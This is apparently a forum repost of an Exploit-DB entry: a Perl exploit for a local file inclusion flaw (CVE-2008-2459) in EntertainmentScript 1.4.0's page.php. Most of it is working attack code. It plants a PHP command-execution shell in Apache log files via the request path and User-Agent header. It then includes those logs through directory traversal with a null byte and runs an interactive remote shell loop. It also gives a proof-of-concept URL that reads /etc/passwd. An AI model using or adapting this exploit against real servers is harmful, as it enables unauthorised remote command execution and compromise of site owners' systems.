- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5655
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2459
- Дата публикации
- 2008-05-20
Код:
#!/usr/bin/perl
# EntertainmentScript V1.4.0 (( page.php page)) Local File Inclusion Exploit
########################################
#[*] Founded & Exploited by : Stack-Terrorist [v40]
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & All muslims HaCkeRs :)
# P0c : http://localhost.il/page.php?page=../../../../../etc/passwd%00
########################################
#----------------------------------------------------------------------------#
########################################
# * TITLE: PerlSploit Class
# * REQUIREMENTS: PHP 4 / PHP 5
# * VERSION: v.1
# * LICENSE: GNU General Public License
# * ORIGINAL URL: http://www.v4-Team/v4.txt
# * FILENAME: PerlSploitClass.pl
# *
# * CONTACT: [email protected] (french / english / arabic / moroco Darija :d )
# * THNX : AllaH
# * GREETZ: Houssamix & Djekmani
########################################
#----------------------------------------------------------------------------#
########################################
use IO::Socket;
use LWP::Simple;
########################################
#--------------------------------------ripped----------------------------------------#
########################################
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
########################################
#----------------------------------------------------------------------------#
########################################
if (@ARGV < 3) {
print "
===============================================================
# EntertainmentScript V1.4.0 Local File Inclusion Exploit #
# perl $0 [Victim] / (apachepath) #
# Ex:perl $0 [Victim] / ../logs/error.log #
===============================================================
# Greetz To: Tryag-Team & v4 Team & H-T Team #
# by : Stack-Terrorist [v40] #
===============================================================
";
exit();
}
########################################
#----------------------------------------------------------------------------#
########################################
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
########################################
#----------------------------------------------------------------------------#
########################################
print "Code is injecting in logfiles...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
print "[shell] ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
########################################
#--------------------------------now include parameter-------------------------#
########################################
print $socket "GET ".$path."/page.php?page=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = <STDIN>;
}
########################################
#----------------------Exploited by : Stack-Terrorist [v40]-----------------#
########################################
# milw0rm.com [2008-05-20]
- Источник
- www.exploit-db.com